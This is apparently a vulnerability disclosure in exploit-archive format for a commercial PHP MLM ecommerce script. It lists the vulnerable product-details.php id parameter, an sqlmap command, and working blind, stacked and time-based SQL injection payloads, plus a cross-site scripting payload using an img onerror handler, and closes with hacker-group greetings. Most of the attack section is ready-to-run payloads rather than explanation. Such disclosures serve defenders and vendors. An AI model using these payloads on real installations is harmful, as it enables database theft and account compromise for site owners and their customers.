ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

[x]========================================================================================================================================[x] | Title        : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities | Software     : Readymade Unilevel Ecommerce | Last Update  : 15/03/24 [TESTED VERSION SCRIPT] | First Release: 16/11/21 | Vendor       : http://www.i-netsolution.com/ | Date         : 01 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : $500 | Description      : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.[x]========================================================================================================================================[x][O] Exploit    http://localhost/eommlm/product-details.php?id=11[SQL]  http://localhost/ecomlm/product-details.php?id=11[XSS]  [O] Proof of concept    sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string    [SQL]  Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=11 AND 1189=1189    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: id=11;SELECT SLEEP(10)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)    [XSS]    http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY>    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]